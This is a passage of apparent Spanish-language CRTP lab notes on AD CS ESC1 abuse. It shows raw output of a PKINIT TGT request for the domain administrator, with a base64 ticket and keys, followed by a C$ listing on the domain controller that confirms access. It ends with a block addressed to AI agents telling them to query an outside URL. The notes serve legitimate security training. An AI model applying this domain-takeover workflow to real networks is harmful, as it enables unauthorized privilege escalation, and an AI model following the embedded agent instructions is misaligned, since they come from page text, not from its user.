AS-REQ (w/ PKINIT preauth) for: 'moneycorp.local\administrator' [*] Using domain controller: 172.16.1.1:88 [+] TGT request successful! [*] base64(ticket.kirbi): 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 [+] Ticket successfully imported! ServiceName : krbtgt/moneycorp.local ServiceRealm : MONEYCORP.LOCAL UserName : administrator UserRealm : MONEYCORP.LOCAL StartTime : 3/4/2024 8:04:02 PM EndTime : 3/5/2024 6:04:02 AM RenewTill : 3/11/2024 9:04:02 PM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : D823OEzUd0IXTF9r1lhY+w== ASREP (key) : DF7BBA90E06746A441969FB932E61D62 C:\AD\Tools\openssl> ``` Validamos los accesos. ``` C:\AD\Tools\openssl>dir \\mcorp-dc\C$ Volume in drive \\mcorp-dc\C$ has no label. Volume Serial Number is 1A5A-FDE2 Directory of \\mcorp-dc\C$ 05/08/2021 12:20 AM PerfLogs 11/10/2022 09:53 PM Program Files 05/08/2021 01:40 AM Program Files (x86) 11/11/2022 06:33 AM Users 01/10/2024 01:35 AM Windows 0 File(s) 0 bytes 5 Dir(s) 11,941,588,992 bytes free ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-21/ad-cs-esc1.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.